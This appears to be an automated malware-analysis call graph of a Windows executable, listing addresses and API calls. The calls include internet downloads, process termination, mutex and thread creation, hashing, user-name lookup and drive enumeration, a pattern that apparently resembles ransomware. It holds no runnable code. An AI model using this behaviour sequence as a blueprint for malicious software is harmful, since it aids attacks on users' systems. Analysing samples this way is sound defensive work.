41687->41688 41688->41684 41689->41618 41857 41d3c0 41690->41857 41693 41c35b 41693->41618 41694 44f23e 59 API calls 41695 41c37a 41694->41695 41695->41618 41867 41d340 41696->41867 41699 41c26b 41699->41618 41700 44f23e 59 API calls 41701 41c28a 41700->41701 41701->41618 41703 41b8d6 41702->41703 41706 41b8e0 41702->41706 41704 414690 59 API calls 41703->41704 41704->41706 41705 41b916 41708 41b930 41705->41708 41709 414690 59 API calls 41705->41709 41706->41705 41707 414690 59 API calls 41706->41707 41707->41705 41710 41b94a 41708->41710 41711 414690 59 API calls 41708->41711 41709->41708 41712 41b964 41710->41712 41713 414690 59 API calls 41710->41713 41711->41710 41880 41bfd0 41712->41880 41713->41712 41715 41b976 41716 41bfd0 59 API calls 41715->41716 41717 41b988 41716->41717 41718 41bfd0 59 API calls 41717->41718 41719 41b99a 41718->41719 41720 414690 59 API calls 41719->41720 41722 41b9b4 41719->41722 41720->41722 41721 41b9f2 41721->41618 41722->41721 41892 413ff0 41722->41892 41724->41618 41726 411cf2 RegOpenKeyExW 41725->41726 41726->41624 41726->41625 41728 415c66 41727->41728 41733 415c1e 41727->41733 41729 415c76 41728->41729 41730 415cff 41728->41730 41736 415c88 ___check_float_string 41729->41736 41775 416950 41729->41775 41784 44f23e 41730->41784 41733->41728 41738 415c45 41733->41738 41736->41629 41740 414690 59 API calls 41738->41740 41741 415c60 41740->41741 41741->41629 41743 414690 59 API calls 41742->41743 41744 413550 41743->41744 41744->41637 41746 4146a9 41745->41746 41747 41478c 41745->41747 41749 4146b6 41746->41749 41750 4146e9 41746->41750 41806 44f26c 59 API calls 3 library calls 41747->41806 41751 414796 41749->41751 41752 4146c2 41749->41752 41753 4147a0 41750->41753 41754 4146f5 41750->41754 41807 44f26c 59 API calls 3 library calls 41751->41807 41805 413340 59 API calls _memmove 41752->41805 41757 44f23e 59 API calls 41753->41757 41755 414707 ___check_float_string 41754->41755 41758 416950 59 API calls 41754->41758 41755->41625 41759 4147aa 41757->41759 41758->41755 41760 4147cd 41759->41760 41761 4147bf 41759->41761 41766 415c10 59 API calls 41760->41766 41763 415c10 59 API calls 41761->41763 41765 4147c8 41763->41765 41764 4146e0 41764->41625 41765->41625 41767 4147ec 41766->41767 41767->41625 41769 41326f 41768->41769 41771 41327d 41768->41771 41770 415c10 59 API calls 41769->41770 41772 413278 41770->41772 41771->41771 41773 415c10 59 API calls 41771->41773 41772->41651 41774 41329c 41773->41774 41774->41651 41776 416986 41775->41776 41777 4169d3 41776->41777 41780 416a0d ___check_float_string 41776->41780 41789 423b4c 41776->41789 41777->41780 41799 44f1bb 59 API calls 3 library calls 41777->41799 41780->41736 41803 430cfc 58 API calls std::exception::_Copy_str 41784->41803 41786 44f256 41804 430eca RaiseException 41786->41804 41788 44f26b 41791 423b54 41789->41791 41790 420c62 _malloc 58 API calls 41790->41791 41791->41790 41792 423b6e 41791->41792 41794 423b72 std::exception::exception 41791->41794 41800 42793d DecodePointer 41791->41800 41792->41777 41801 430eca RaiseException 41794->41801 41796 423b9c 41802 430d91 58 API calls _free 41796->41802 41798 423bae 41798->41777 41800->41791 41801->41796 41802->41798 41803->41786 41804->41788 41805->41764 41806->41751 41807->41753 41808->41672 41809->41672 41818 427ad7 GetModuleHandleExW 41810->41818 41813->41667 41822 42501f GetLastError 41814->41822 41816 42520d 41816->41671 41817->41661 41819 427af0 GetProcAddress 41818->41819 41820 427b07 ExitProcess 41818->41820 41819->41820 41821 427b02 41819->41821 41821->41820 41836 432534 41822->41836 41824 425034 41825 425082 SetLastError 41824->41825 41839 428c96 41824->41839 41825->41816 41829 42505b 41830 425061 41829->41830 41831 425079 41829->41831 41846 42508e 58 API calls 3 library calls 41830->41846 41832 420bed _free 55 API calls 41831->41832 41834 42507f 41832->41834 41834->41825 41835 425069 GetCurrentThreadId 41835->41825 41837 43254b TlsGetValue 41836->41837 41838 432547 41836->41838 41837->41824 41838->41824 41841 428c9d 41839->41841 41842 425047 41841->41842 41844 428cbb 41841->41844 41847 43b813 41841->41847 41842->41825 41845 432553 TlsSetValue 41842->41845 41844->41841 41844->41842 41855 4329c9 Sleep 41844->41855 41845->41829 41846->41835 41848 43b81e 41847->41848 41852 43b839 41847->41852 41849 43b82a 41848->41849 41848->41852 41850 425208 __vsnwprintf_s_l 57 API calls 41849->41850 41853 43b82f 41850->41853 41851 43b849 RtlAllocateHeap 41851->41852 41851->41853 41852->41851 41852->41853 41856 42793d DecodePointer 41852->41856 41853->41841 41855->41844 41856->41852 41860 41ccc0 41857->41860 41861 423b4c 59 API calls 41860->41861 41862 41ccca 41861->41862 41865 41c347 41862->41865 41866 44f1bb 59 API calls 3 library calls 41862->41866 41865->41693 41865->41694 41872 41cc50 41867->41872 41870 41c257 41870->41699 41870->41700 41873 423b4c 59 API calls 41872->41873 41874 41cc5d 41873->41874 41875 41cc64 41874->41875 41879 44f1bb 59 API calls 3 library calls 41874->41879 41875->41870 41878 41d740 59 API calls 41875->41878 41878->41870 41881 41c001 41880->41881 41882 41c00a 41880->41882 41881->41882 41883 41c083 41881->41883 41884 41c04c 41881->41884 41882->41715 41886 41c09e 41883->41886 41888 41c0e1 41883->41888 41919 41cf30 41884->41919 41887 41cf30 59 API calls 41886->41887 41890 41c0b2 41887->41890 41927 41c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 41888->41927 41890->41882 41923 41d5b0 41890->41923 41893 4140f2 41892->41893 41894 414009 41892->41894 41939 44f26c 59 API calls 3 library calls 41893->41939 41896 414016 41894->41896 41897 41405d 41894->41897 41898 4140fc 41896->41898 41899 414022 41896->41899 41900 414106 41897->41900 41905 414066 41897->41905 41940 44f26c 59 API calls 3 library calls 41898->41940 41902 414044 41899->41902 41903 41402b 41899->41903 41904 44f23e 59 API calls 41900->41904 41929 412e80 59 API calls _memmove 41902->41929 41928 412e80 59 API calls _memmove 41903->41928 41907 414110 41904->41907 41918 414078 ___check_float_string 41905->41918 41930 416760 41905->41930 41911 41413a 41907->41911 41912 41412c 41907->41912 41910 41403b 41910->41721 41916 4156d0 59 API calls 41911->41916 41941 4156d0 41912->41941 41913 414054 41913->41721 41915 414135 41915->41721 41917 414151 41916->41917 41917->41721 41918->41721 41920 41cf41 41919->41920 41921 41cf5b 41919->41921 41920->41921 41922 414690 59 API calls 41920->41922 41921->41882 41922->41920 41925 41d5e2 41923->41925 41924 41d63e 41924->41882 41925->41924 41926 414690 59 API calls 41925->41926 41926->41925 41927->41890 41928->41910 41929->41913 41932 416793 41930->41932 41931 4167dc 41935 416817 ___check_float_string 41931->41935 41960 44f1bb 59 API calls 3 library calls 41931->41960 41932->41931 41933 423b4c 59 API calls 41932->41933 41932->41935 41933->41931 41935->41918 41939->41898 41940->41900 41942 415735 41941->41942 41943 4156de 41941->41943 41944 4157bc 41942->41944 41945 41573e 41942->41945 41943->41942 41952 415704 41943->41952 41946 44f23e 59 API calls 41944->41946 41947 416760 59 API calls 41945->41947 41950 415750 ___check_float_string 41945->41950 41949 4157c6 41946->41949 41947->41950 41948 4157db 41948->41915 41949->41948 41961 44f26c 59 API calls 3 library calls 41949->41961 41950->41915 41954 415709 41952->41954 41955 41571f 41952->41955 41953 415806 41957 413ff0 59 API calls 41954->41957 41956 413ff0 59 API calls 41955->41956 41958 41572f 41956->41958 41959 415719 41957->41959 41958->41915 41959->41915 41961->41953 41962 423f84 41963 423f90 __initptd 41962->41963 41999 432603 GetStartupInfoW 41963->41999 41966 423f95 42001 4278d5 GetProcessHeap 41966->42001 41967 423fed 41968 423ff8 41967->41968 42330 42411a 58 API calls 3 library calls 41967->42330 42002 425141 41968->42002 41971 423ffe 41972 424009 __RTC_Initialize 41971->41972 42331 42411a 58 API calls 3 library calls 41971->42331 42023 428754 41972->42023 41975 424018 41976 424024 GetCommandLineW 41975->41976 42332 42411a 58 API calls 3 library calls 41975->42332 42042 43235f GetEnvironmentStringsW 41976->42042 41979 424023 41979->41976 41982 42403e 41983 424049 41982->41983 42333 427c2e 58 API calls 3 library calls 41982->42333 42052 4321a1 41983->42052 41987 42405a 42066 427c68 41987->42066 41990 424062 41991 42406d __wwincmdln 41990->41991 42335 427c2e 58 API calls 3 library calls 41990->42335 42072 419f90 41991->42072 41994 424081 41995 424090 41994->41995 42327 427f3d 41994->42327 42336 427c59 58 API calls _doexit 41995->42336 41998 424095 __initptd 42000 432619 41999->42000 42000->41966 42001->41967 42337 427d6c EncodePointer 42002->42337 42004 425146 42342 428c48 42004->42342 42007 42514f 42349 4251b7 61 API calls 2 library calls 42007->42349 42010 425154 42010->41971 42012 42516c 42013 428c96 __calloc_crt 58 API calls 42012->42013 42014 425179 42013->42014 42015 4251ae 42014->42015 42350 432553 TlsSetValue 42014->42350 42352 4251b7 61 API calls 2 library calls 42015->42352 42018 42518d 42018->42015 42020 425193 42018->42020 42019 4251b3 42019->41971 42351 42508e 58 API calls 3 library calls 42020->42351 42022 42519b GetCurrentThreadId 42022->41971 42024 428760 __initptd 42023->42024 42355 428af7 42024->42355 42026 428767 42027 428c96 __calloc_crt 58 API calls 42026->42027 42028 428778 42027->42028 42029 4287e3 GetStartupInfoW 42028->42029 42030 428783 __initptd @_EH4_CallFilterFunc@8 42028->42030 42036 4287f8 42029->42036 42037 428927 42029->42037 42030->41975 42031 4289ef 42364 4289ff LeaveCriticalSection _doexit 42031->42364 42033 428c96 __calloc_crt 58 API calls 42033->42036 42034 428974 GetStdHandle 42034->42037 42035 428987 GetFileType 42035->42037 42036->42033 42036->42037 42039 428846 42036->42039 42037->42031 42037->42034 42037->42035 42363 43263e InitializeCriticalSectionAndSpinCount 42037->42363 42038 42887a GetFileType 42038->42039 42039->42037 42039->42038 42362 43263e InitializeCriticalSectionAndSpinCount 42039->42362 42043 432370 42042->42043 42044 424034 42042->42044 42395 428cde 58 API calls 2 library calls 42043->42395 42048 431f64 GetModuleFileNameW 42044->42048 42046 4323ac FreeEnvironmentStringsW 42046->42044 42047 432396 ___check_float_string 42047->42046 42049 431f98 _wparse_cmdline 42048->42049 42051 431fd8 _wparse_cmdline 42049->42051 42396 428cde 58 API calls 2 library calls 42049->42396 42051->41982 42053 4321ba _GetLcidFromLanguage 42052->42053 42057 42404f 42052->42057 42054 428c96 __calloc_crt 58 API calls 42053->42054 42062 4321e3 _GetLcidFromLanguage 42054->42062 42055 43223a 42056 420bed _free 58 API calls 42055->42056 42056->42057 42057->41987 42334 427c2e 58 API calls 3 library calls 42057->42334 42058 428c96 __calloc_crt 58 API calls 42058->42062 42059 43225f 42060 420bed _free 58 API calls 42059->42060 42060->42057 42062->42055 42062->42057 42062->42058 42062->42059 42063 432276 42062->42063 42397 42962f 58 API calls __vsnwprintf_s_l 42062->42397 42398 4242fd 8 API calls 2 library calls 42063->42398 42065 432282 42068 427c74 __IsNonwritableInCurrentImage 42066->42068 42399 43aeb5 42068->42399 42069 427c92 __initterm_e 42071 427cb1 _doexit __IsNonwritableInCurrentImage 42069->42071 42402 4219ac 67 API calls __cinit 42069->42402 42071->41990 42073 419fa0 __write_nolock 42072->42073 42403 40cf10 42073->42403 42075 419fb0 42076 419fc4 GetCurrentProcess GetLastError SetPriorityClass 42075->42076 42077 419fb4 42075->42077 42078 419fe4 GetLastError 42076->42078 42079 419fe6 42076->42079 42775 4124e0 109 API calls _memset 42077->42775 42078->42079 42081 41d3c0 59 API calls 42079->42081 42083 41a00a 42081->42083 42082 419fb9 42082->41994 42084 41a022 42083->42084 42085 41b669 42083->42085 42089 41d340 59 API calls 42084->42089 42086 44f23e 59 API calls 42085->42086 42087 41b673 42086->42087 42088 44f23e 59 API calls 42087->42088 42090 41b67d 42088->42090 42091 41a04d 42089->42091 42091->42087 42092 41a065 42091->42092 42417 413a90 42092->42417 42096 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 42097 41a33d GlobalFree 42096->42097 42112 41a196 42096->42112 42098 41a354 42097->42098 42099 41a45c 42097->42099 42433 412220 42098->42433 42102 412220 76 API calls 42099->42102 42100 41a100 42100->42096 42103 41a359 42102->42103 42105 41a466 42103->42105 42448 40ef50 42103->42448 42104 41a1cc lstrcmpW lstrcmpW 42104->42112 42105->41994 42107 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 42107->42112 42108 420235 60 API calls _LanguageEnumProc@4 42108->42112 42109 41a48f 42111 41a4ef 42109->42111 42453 413ea0 42109->42453 42114 411cd0 92 API calls 42111->42114 42112->42097 42112->42104 42112->42107 42112->42108 42113 41a361 42112->42113 42776 423c92 59 API calls __woutput_p_l 42113->42776 42116 41a563 42114->42116 42119 414690 59 API calls 42116->42119 42150 41a5db 42116->42150 42117 41a36e lstrcpyW lstrcpyW 42118 41a395 OpenProcess 42117->42118 42120 41a402 42118->42120 42121 41a3a9 WaitForSingleObject CloseHandle 42118->42121 42123 41a5a9 42119->42123 42124 411cd0 92 API calls 42120->42124 42121->42120 42126 41a3cb 42121->42126 42122 41a6f9 42782 411a10 8 API calls 42122->42782 42128 414690 59 API calls 42123->42128 42129 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 42124->42129 42143 41a3e2 GlobalFree 42126->42143 42144 41a3d4 Sleep 42126->42144 42777 411ab0 PeekMessageW 42126->42777 42127 41a6fe 42130 41a8b6 CreateMutexA 42127->42130 42131 41a70f 42127->42131 42134 41a5d4 42128->42134 42135 41a451 42129->42135 42137 41a8ca 42130->42137 42136 41a7d0 42131->42136 42148 40ef50 58 API calls 42131->42148 42133 41a618 42133->42130 42138 41a624 GetVersion 42133->42138 42474 40d240 CoInitialize 42134->42474 42135->41994 42139 40ef50 58 API calls 42136->42139 42142 40ef50 58 API calls 42137->42142 42138->42122 42140 41a632 lstrcpyW lstrcatW lstrcatW 42138->42140 42145 41a7ec 42139->42145 42146 41a674 _memset 42140->42146 42153 41a8da 42142->42153 42147 41a3f7 42143->42147 42144->42118 42149 41a7f1 lstrlenA 42145->42149 42152 41a6b4 ShellExecuteExW 42146->42152 42147->41994 42156 41a72f 42148->42156 42151 420c62 _malloc 58 API calls 42149->42151 42150->42122 42150->42127 42150->42133 42154 41a810 _memset 42151->42154 42152->42127 42155 41a6e3 42152->42155 42157 413ea0 59 API calls 42153->42157 42168 41a92f 42153->42168 42159 41a81e MultiByteToWideChar lstrcatW 42154->42159 42170 41a9d1 42155->42170 42158 413ea0 59 API calls 42156->42158 42161 41a780 42156->42161 42157->42153 42158->42156 42159->42149 42160 41a847 lstrlenW 42159->42160 42162 41a8a0 CreateMutexA 42160->42162 42163 41a856 42160->42163 42164 41a79c CreateThread 42161->42164 42166 413ff0 59 API calls 42161->42166 42162->42137 42556 40e760 42163->42556 42164->42136 44019 41dbd0 42164->44019 42166->42164 42167 41a860 CreateThread WaitForSingleObject 42167->42162 43950 41e690 42167->43950 42169 415c10 59 API calls 42168->42169 42171 41a98c 42169->42171 42170->41994 42567 412840 42171->42567 42173 41a997 42572 410fc0 CryptAcquireContextW 42173->42572 42175 41a9ab 42176 41a9c2 lstrlenA 42175->42176 42176->42170 42178 41a9d8 42176->42178 42177 415c10 59 API calls 42179 41aa23 42177->42179 42178->42177 42180 412840 60 API calls 42179->42180 42181 41aa2e lstrcpyA 42180->42181 42184 41aa4b 42181->42184 42183 415c10 59 API calls 42185 41aa90 42183->42185 42184->42183 42186 40ef50 58 API calls 42185->42186 42187 41aaa0 42186->42187 42188 413ea0 59 API calls 42187->42188 42189 41aaf5 42187->42189 42188->42187 42190 413ff0 59 API calls 42189->42190 42191 41ab1d 42190->42191 42595 412900 42191->42595 42193 40ef50 58 API calls 42195 41abc5 42193->42195 42194 41ab28 _memmove 42194->42193 42196 413ea0 59 API calls 42195->42196 42197 41ac1e 42195->42197 42196->42195 42198 413ff0 59 API calls 42197->42198 42199 41ac46 42198->42199 42200 412900 60 API calls 42199->42200 42202 41ac51 _memmove 42200->42202 42201 40ef50 58 API calls 42203 41acee 42201->42203 42202->42201 42204 413ea0 59 API calls 42203->42204 42205 41ad43 42203->42205 42204->42203 42206 413ff0 59 API calls 42205->42206 42207 41ad6b 42206->42207 42208 412900 60 API calls 42207->42208 42209 41ad76 _memmove 42208->42209 42210 415c10 59 API calls 42209->42210 42211 41ae2a 42210->42211 42600 413580 42211->42600 42213 41ae3c 42214 415c10 59 API calls 42213->42214 42215 41ae76 42214->42215 42216 413580 59 API calls 42215->42216 42217 41ae82 42216->42217 42218 415c10 59 API calls 42217->42218 42219 41aebc 42218->42219 42220 413580 59 API calls 42219->42220 42221 41aec8 42220->42221 42222 415c10 59 API calls 42221->42222 42223 41af02 42222->42223 42224 413580 59 API calls 42223->42224 42225 41af0e 42224->42225 42226 415c10 59 API calls 42225->42226 42227 41af48 42226->42227 42228 413580 59 API calls 42227->42228 42229 41af54 42228->42229 42230 415c10 59 API calls 42229->42230 42231 41af8e 42230->42231 42232 413580 59 API calls 42231->42232 42233 41af9a 42232->42233 42234 415c10 59 API calls 42233->42234 42235 41afd4 42234->42235 42236 413580 59 API calls 42235->42236 42237 41afe0 42236->42237 42238 413100 59 API calls 42237->42238 42239 41b001 42238->42239 42240 413580 59 API calls 42239->42240 42241 41b025 42240->42241 42242 413100 59 API calls 42241->42242 42243 41b03c 42242->42243 42244 413580 59 API calls 42243->42244 42245 41b059 42244->42245 42246 413100 59 API calls 42245->42246 42247 41b070 42246->42247 42248 413580 59 API calls 42247->42248 42249 41b07c 42248->42249 42250 413100 59 API calls 42249->42250 42251 41b093 42250->42251 42252 413580 59 API calls 42251->42252 42253 41b09f 42252->42253 42254 413100 59 API calls 42253->42254 42255 41b0b6 42254->42255 42256 413580 59 API calls 42255->42256 42257 41b0c2 42256->42257 42258 413100 59 API calls 42257->42258 42259 41b0d9 42258->42259 42260 413580 59 API calls 42259->42260 42261 41b0e5 42260->42261 42262 413100 59 API calls 42261->42262 42263 41b0fc 42262->42263 42264 413580 59 API calls 42263->42264 42265 41b108 42264->42265 42267 41b130 42265->42267 42783 41cdd0 59 API calls 42265->42783 42268 40ef50 58 API calls 42267->42268 42269 41b16e 42268->42269 42271 41b1a5 GetUserNameW 42269->42271 42607 412de0 42269->42607 42272 41b1c9 42271->42272 42614 412c40 42272->42614 42274 41b1d8 42621 412bf0 42274->42621 42278 41b2f5 42632 4136c0 42278->42632 42282 41b311 42648 4130b0 42282->42648 42284 412c40 59 API calls 42299 41b1f3 42284->42299 42287 412900 60 API calls 42287->42299 42288 41b327 42674 4111c0 CreateFileW 42288->42674 42289 413580 59 API calls 42289->42299 42291 41b33b 42759 41ba10 LoadCursorW RegisterClassExW 42291->42759 42293 41b343 42760 41ba80 CreateWindowExW 42293->42760 42295 413100 59 API calls 42295->42299 42296 41b34b 42296->42170 42763 410a50 GetLogicalDrives 42296->42763 42299->42278 42299->42284 42299->42287 42299->42289 42299->42295 42784 40f1f0 59 API calls 42299->42784 44541 427e0e 42327->44541 42329 427f4c 42329->41995 42330->41968 42331->41972 42332->41979 42336->41998 42338 427d7d __init_pointers __initp_misc_winsig 42337->42338 42353 423540 EncodePointer 42338->42353 42340 427d95 __init_pointers 42341 4326ac 34 API calls 42340->42341 42341->42004 42345 428c54 42342->42345 42344 42514b 42344->42007 42346 4324f7 42344->42346 42345->42344 42354 43263e InitializeCriticalSectionAndSpinCount 42345->42354 42347 43250e TlsAlloc 42346->42347 42348 425161 42346->42348 42348->42007 42348->42012 42349->42010 42350->42018 42351->42022 42352->42019 42353->42340 42354->42345 42356 428b1b EnterCriticalSection 42355->42356 42357 428b08 42355->42357 42356->42026 42365 428b9f 42357->42365 42359 428b0e 42359->42356 42389 427c2e 58 API calls 3 library calls 42359->42389 42362->42039 42363->42037 42364->42030 42366 428bab __initptd 42365->42366 42367 428bb4 42366->42367 42368 428bcc 42366->42368 42390 427f51 58 API calls 2 library calls 42367->42390 42376 428bed __initptd 42368->42376 42392 428cde 58 API calls 2 library calls 42368->42392 42370 428bb9 42391 427fae 58 API calls 9 library calls 42370->42391 42372 428be1 42374 428bf7 42372->42374 42375 428be8 42372->42375 42379 428af7 __lock 58 API calls 42374->42379 42378 425208 __vsnwprintf_s_l 58 API calls 42375->42378 42376->42359 42377 428bc0 42380 427b0b _malloc 3 API calls 42377->42380 42378->42376 42381 428bfe 42379->42381 42382 428bca 42380->42382 42383 428c23 42381->42383 42384 428c0b 42381->42384 42382->42368 42386 420bed _free 58 API calls 42383->42386 42393 43263e InitializeCriticalSectionAndSpinCount 42384->42393 42387 428c17 42386->42387 42394 428c3f LeaveCriticalSection _doexit 42387->42394 42390->42370 42391->42377 42392->42372 42393->42387 42394->42376 42395->42047 42396->42051 42397->42062 42398->42065 42400 43aeb8 EncodePointer 42399->42400 42400->42400 42401 43aed2 42400->42401 42401->42069 42402->42071 42404 40cf32 _memset __write_nolock 42403->42404 42405 40cf4f InternetOpenW 42404->42405 42406 415c10 59 API calls 42405->42406 42407 40cf8a InternetOpenUrlW 42406->42407 42408 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 42407->42408 42416 40cfb2 42407->42416 42409 4156d0 59 API calls 42408->42409 42410 40d000 42409->42410 42411 4156d0 59 API calls 42410->42411 42412 40d049 42411->42412 42412->42416 42785 413010 42412->42785 42414 40d084 42415 413010 59 API calls 42414->42415 42414->42416 42415->42416 42416->42075 42418 413ab2 42417->42418 42425 413ad0 GetModuleFileNameW PathRemoveFileSpecW 42417->42425 42419 413b00 42418->42419 42420 413aba 42418->42420 42422 44f23e 59 API calls 42419->42422 42421 423b4c 59 API calls 42420->42421 42423 413ac7 42421->42423 42422->42423 42423->42425 42788 44f1bb 59 API calls 3 library calls 42423->42788 42427 418400 42425->42427 42428 418437 42427->42428 42431 418446 42427->42431 42428->42431 42789 415d50 42428->42789 42430 4184b9 42430->42100 42431->42430 42799 418d50 59 API calls 42431->42799 42434 42f7c0 __write_nolock 42433->42434 42435 41222d 7 API calls 42434->42435 42436 4122bd K32EnumProcesses 42435->42436 42437 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 42435->42437 42438 4122d3 42436->42438 42439 4122df 42436->42439 42437->42436 42438->42103 42440 412353 42439->42440 42441 4122f0 OpenProcess 42439->42441 42440->42103 42442 412346 CloseHandle 42441->42442 42443 41230a K32EnumProcessModules 42441->42443 42442->42440 42442->42441 42443->42442 42444 41231c K32GetModuleBaseNameW 42443->42444 42800 420235 42444->42800 42446 41233e 42446->42442 42447 412345 42446->42447 42447->42442 42449 420c62 _malloc 58 API calls 42448->42449 42452 40ef6e _memset 42449->42452 42450 40efdc 42450->42109 42451 420c62 _malloc 58 API calls 42451->42452 42452->42450 42452->42451 42454 413f05 42453->42454 42455 413eae 42453->42455 42456 413fb1 42454->42456 42457 413f18 42454->42457 42455->42454 42464 413ed4 42455->42464 42458 44f23e 59 API calls 42456->42458 42459 413fbb 42457->42459 42460 413f2d 42457->42460 42466 413f3d ___check_float_string 42457->42466 42458->42459 42461 44f23e 59 API calls 42459->42461 42462 416760 59 API calls 42460->42462 42460->42466 42463 413fc5 42461->42463 42462->42466 42465 413ff0 59 API calls 42463->42465 42467 413ed9 42464->42467 42468 413eef 42464->42468 42469 413fdf 42465->42469 42466->42109 42812 413da0 59 API calls ___check_float_string 42467->42812 42813 413da0 59 API calls ___check_float_string 42468->42813 42469->42109 42472 413ee9 42472->42109 42473 413eff 42473->42109 42475 40d27d CoInitializeSecurity 42474->42475 42480 40d276 42474->42480 42476 414690 59 API calls 42475->42476 42477 40d2b8 CoCreateInstance 42476->42477 42478 40d2e3 VariantInit VariantInit VariantInit VariantInit 42477->42478 42479 40da3c CoUninitialize 42477->42479 42481 40d38e VariantClear VariantClear VariantClear VariantClear 42478->42481 42479->42480 42480->42150 42482 40d3e2 42481->42482 42483 40d3cc CoUninitialize 42481->42483 42814 40b140 42482->42814 42483->42480 42486 40d3f6 42819 40b1d0 42486->42819 42488 40d422 42489 40d426 CoUninitialize 42488->42489 42490 40d43c 42488->42490 42489->42480 42491 40b140 60 API calls 42490->42491 42493 40d449 42491->42493 42494 40b1d0 SysFreeString 42493->42494 42495 40d471 42494->42495 42496 40d496 CoUninitialize 42495->42496 42497 40d4ac 42495->42497 42496->42480 42499 40d8cf 42497->42499 42500 40b140 60 API calls 42497->42500 42499->42479 42501 40d4d5 42500->42501 42502 40b1d0 SysFreeString 42501->42502 42503 40d4fd 42502->42503 42503->42499 42504 40b140 60 API calls 42503->42504 42505 40d5ae 42504->42505 42506 40b1d0 SysFreeString 42505->42506 42507 40d5d6 42506->42507 42507->42499 42508 40b140 60 API calls 42507->42508 42509 40d679 42508->42509 42510 40b1d0 SysFreeString 42509->42510 42511 40d6a1 42510->42511 42511->42499 42512 40b140 60 API calls 42511->42512 42513 40d6b6 42512->42513 42514 40b1d0 SysFreeString 42513->42514 42515 40d6de 42514->42515 42515->42499 42516 40b140 60 API calls 42515->42516 42517 40d707 42516->42517 42518 40b1d0 SysFreeString 42517->42518 42519 40d72f 42518->42519 42519->42499 42520 40b140 60 API calls 42519->42520 42521 40d744 42520->42521 42522 40b1d0 SysFreeString 42521->42522 42523 40d76c 42522->42523 42523->42499 42823 423aaf GetSystemTimeAsFileTime 42523->42823 42525 40d77d 42825 423551 42525->42825 42530 412c40 59 API calls 42531 40d7b5 42530->42531 42532 412900 60 API calls 42531->42532 42533 40d7c3 42532->42533 42534 40b140 60 API calls 42533->42534 42535 40d7db 42534->42535 42536 40b1d0 SysFreeString 42535->42536 42537 40d7ff 42536->42537 42537->42499 42538 40b140 60 API calls 42537->42538 42539 40d8a3 42538->42539 42540 40b1d0 SysFreeString 42539->42540 42541 40d8cb 42540->42541 42541->42499 42542 40b140 60 API calls 42541->42542 42543 40d8ea 42542->42543 42544 40b1d0 SysFreeString 42543->42544 42545 40d912 42544->42545 42545->42499 42833 40b400 SysAllocString 42545->42833 42547 40d936 VariantInit VariantInit 42548 40b140 60 API calls 42547->42548 42549 40d985 42548->42549 42550 40b1d0 SysFreeString 42549->42550 42551 40d9e7 VariantClear VariantClear VariantClear 42550->42551 42552 40da10 42551->42552 42553 40da46 CoUninitialize 42551->42553 42837 42052a 78 API calls swprintf 42552->42837 42553->42480 42992 40e670 42556->42992 42558 40e79e 42559 413ea0 59 API calls 42558->42559 42560 40e7c3 42559->42560 42561 413ff0 59 API calls 42560->42561 42562 40e7ff 42561->42562 43018 40e870 42562->43018 42564 40e806 42565 413ff0 59 API calls 42564->42565 42566 40e80d 42564->42566 42565->42566 42566->42167 43272 413c40 42567->43272 42569 41288c WideCharToMultiByte 43282 4184e0 42569->43282 42571 4128cf 42571->42173 42573 41102b CryptCreateHash 42572->42573 42574 41101a 42572->42574 42576 411045 42573->42576 42577 411056 lstrlenA CryptHashData 42573->42577 43291 430eca RaiseException 42574->43291 43292 430eca RaiseException 42576->43292 42579 41107f CryptGetHashParam 42577->42579 42580 41106e 42577->42580 42582 41109f 42579->42582 42584 4110b0 _memset 42579->42584 43293 430eca RaiseException 42580->43293 43294 430eca RaiseException 42582->43294 42585 4110cf CryptGetHashParam 42584->42585 42586 4110f5 42585->42586 42587 4110e4 42585->42587 42589 420c62 _malloc 58 API calls 42586->42589 43295 430eca RaiseException 42587->43295 42591 411105 _memset 42589->42591 42590 411148 42593 41114e CryptDestroyHash CryptReleaseContext 42590->42593 42591->42590 42592 4204a6 _sprintf 83 API calls 42591->42592 42594 411133 lstrcatA 42592->42594 42593->42175 42594->42590 42594->42591 42596 413a90 59 API calls 42595->42596 42597 41294c MultiByteToWideChar 42596->42597 42598 418400 59 API calls 42597->42598 42599 41298d 42598->42599 42599->42194 42601 413591 42600->42601 42602 4135d6 42600->42602 42601->42602 42603 413597 42601->42603 42606 4135b7 42602->42606 43297 414f70 59 API calls 42602->43297 42603->42606 43296 414f70 59 API calls 42603->43296 42606->42213 42608 412dfa 42607->42608 42609 412dec 42607->42609 42612 413ea0 59 API calls 42608->42612 42610 413ea0 59 API calls 42609->42610 42611 412df5 42610->42611 42611->42269 42613 412e11 42612->42613 42613->42269 42615 412c71 42614->42615 42616 412c5f 42614->42616 42619 4156d0 59 API calls 42615->42619 42617 4156d0 59 API calls 42616->42617 42618 412c6a 42617->42618 42618->42274 42620 412c8a 42619->42620 42620->42274 42622 413ff0 59 API calls 42621->42622 42623 412c13 42622->42623 42624 40ecb0 42623->42624 42626 40ece5 42624->42626 42627 40eefc 42626->42627 43298 421b3b 59 API calls 2 library calls 42626->43298 42627->42299 42628 4156d0 59 API calls 42630 40ed6b _memmove 42628->42630 42629 415230 59 API calls 42629->42630 42630->42627 42630->42628 42630->42629 43299 421b3b 59 API calls 2 library calls 42630->43299 42633 4136e7 42632->42633 42634 413742 42632->42634 42633->42634 42635 4136ed 42633->42635 42639 41370d 42634->42639 43301 414f70 59 API calls 42634->43301 42635->42639 43300 414f70 59 API calls 42635->43300 42637 41377f 42641 40ca70 42637->42641 42639->42637 42640 414690 59 API calls 42639->42640 42640->42637 42642 40cb64 42641->42642 42646 40caa3 42641->42646 42642->42282 42643 40cb6b 43302 44f26c 59 API calls 3 library calls 42643->43302 42645 40cb75 42645->42282 42646->42642 42646->42643 42647 4136c0 59 API calls 42646->42647 42647->42646 42649 414690 59 API calls 42648->42649 42650 4130d4 42649->42650 42651 40c740 42650->42651 43303 420fdd 42651->43303 42654 40c944 CreateDirectoryW 42656 420fdd 115 API calls 42654->42656 42662 40c960 42656->42662 42657 40c90e 42657->42654 42672 40c96a 42657->42672 42658 40c906 42659 423a38 __fcloseall 83 API calls 42658->42659 42659->42657 42660 40c9d5 43306 4228fd 42660->43306 42662->42660 42668 4228fd _fputws 82 API calls 42662->42668 42662->42672 42668->42662 42670 415c10 59 API calls 42673 40c79e _memmove 42670->42673 42671 414f70 59 API calls 42671->42673 42672->42288 42673->42658 42673->42670 42673->42671 